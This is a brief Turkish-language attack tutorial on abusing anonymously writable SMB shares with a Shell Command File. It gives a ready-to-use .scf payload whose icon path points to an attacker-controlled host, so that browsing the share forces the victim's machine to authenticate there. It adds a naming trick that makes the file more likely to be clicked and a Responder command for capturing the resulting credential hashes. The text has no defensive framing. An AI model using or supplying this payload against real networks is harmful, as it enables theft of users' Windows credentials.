SMB – SCF File Attacks

SMB, her hangi bir zafiyet ve içerisinde hassas bir veri içermese de kimliği doğrulanmamış anonim bir kullanıcı için yazma izni varsa burayı sömürmek mümkün olabiliyor.

Bunun için SCF (Shell Command File) adı verilen dosyalar Windows tarafından kullanılır örneğin masaüstünü göster butonu dosyaları açmak için çift tıklama gibi yerlerde kullanılır.

Kod Şu şekilde olacak:

[Shell]

Command=2

IconFile=\\X.X.X.X\share\test.ico

[Taskbar]

Command=ToggleDesktop

Bu dosyayı .scf olarak kaydetmeliyiz ve dosyanın başına @ eklemeliyiz. @ Eklediğimiz de bu dosya mevcut dosya konumunun en üstüne çıkartır bu da tıklanma olasılığını arttırır.

Bir kullanıcı, \X.X.X.X\share\test.ico paylaşımını açar ve .scf uzantılı dosya otomatik olarak yürütülür, bu da kurban sistemi yanıtlayanın dinlediği X.X.X.X ipsinde ki saldıran sistemde kimlik doğrulaması yapmaya zorlar:

Şimdi Responder'ı çalıştırarak, kurbanın bu dosyayı çalıştırmasını beklemeliyiz.

responder -wrf --lm -v -I eth0